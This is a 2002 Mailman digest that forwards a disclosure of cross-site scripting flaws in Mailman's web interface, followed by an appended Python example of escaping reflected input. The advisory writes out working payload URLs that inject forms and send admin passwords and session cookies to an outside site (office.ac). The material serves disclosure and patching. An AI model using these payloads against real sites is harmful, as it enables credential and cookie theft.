[For Mailman admins: please upgrade -- Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Message-Id: <[EMAIL PROTECTED]>
From: office <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: cross-site scripting bug of Mailman
Date: Wed, 24 Jul 2002 17:03:30 +0900

Mailman: cross-site scripting bug

Product: Mailman
Affected Version: 2.0.11 and under it
Vendor's URL: http://www.gnu.org/software/mailman/
Solution: Use fixed version 2.0.12 or later

Introduction:
------------
Mailman is software to help manage electronic mail discussion lists,
much like Majordomo or Smartmail. And Mailman has a web interface system.

Example:
-----------------
This is a simple example for version 2.0.10:

You can recognize the vulnerability with this type of URL:

http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

and that proves that any (malicious) script code is possible on the web
interface part of Mailman.

For example, if you access this URL with Internet Explorer (other
browsers are not affected by the URL), the page figure is similar to the
real one, but the admin password you enter and submit is sent to
another malicious site (http://www.office.ac/). This URL is valid for
version 2.0.10.

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

And Mailman 2.0.11 still has vulnerabilities: if you access these URLs
with Internet Explorer (other browsers are not affected by these URLs),
your information in the cookie about the mailman_site could be sent to
another malicious site (http://www.office.ac/).

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>

Vendor's response:
--------------
The vendor was notified about the first problem on 20th of May 2002.
On the same 20th May 2002, version 2.0.11 was released.
http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

And the vendor was notified about other problems on 21st of May 2002.
The fixed version 2.0.12 was released on 11th of Jul 2002.
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html

Solution:
--------------
Users should upgrade to Mailman 2.0.12 or later

--
office
[EMAIL PROTECTED]
[EMAIL PROTECTED]
http://www.office.ac/

------------------------------

End of this Digest
******************

--
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves
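The bug class reported in the message above, as an added illustration that is not Mailman's code and not part of the advisory: a query-string value reflected into an HTML attribute verbatim, next to the escaped form, with a parser-based check of what the browser would see. The form template, the function names and the choice of `adminpw` as the reflection point are assumptions; the probe string is the one from the advisory's first URL.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Hypothetical login-form template; an assumption, not Mailman's real markup.
FORM = ('<form action="/admin/ml-name" method="post">'
        '<input type="password" name="adminpw" value="{value}">'
        '</form>')

# Constructed query string carrying the probe from the advisory's first URL.
PROBE = '"><script>alert("hello")</script>'
PROBE_QS = "adminpw=" + PROBE


def _param(query_string, name):
    """First value of a query parameter, or the empty string if absent."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_unsafe(query_string):
    """Bug class: the decoded value is pasted into the attribute verbatim."""
    return FORM.format(value=_param(query_string, "adminpw"))


def render_safe(query_string):
    """Fix: escape &, <, > and both quote characters before reflecting."""
    value = _param(query_string, "adminpw")
    return FORM.format(value=html.escape(value, quote=True))


class _Collector(HTMLParser):
    """Records every start tag and the value of the adminpw input field."""

    def __init__(self):
        super().__init__()
        self.tags, self.adminpw = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and dict(attrs).get("name") == "adminpw":
            self.adminpw = dict(attrs).get("value")


def parse_page(page):
    """Tokenize the rendered page and return (start tags, adminpw value)."""
    collector = _Collector()
    collector.feed(page)
    collector.close()
    return collector.tags, collector.adminpw


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        print(render.__name__, parse_page(render(PROBE_QS)))
```

The same parse-and-compare check works as a regression test for any handler that echoes request parameters: the tag list must not change with the input, and the field value must round-trip unchanged.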
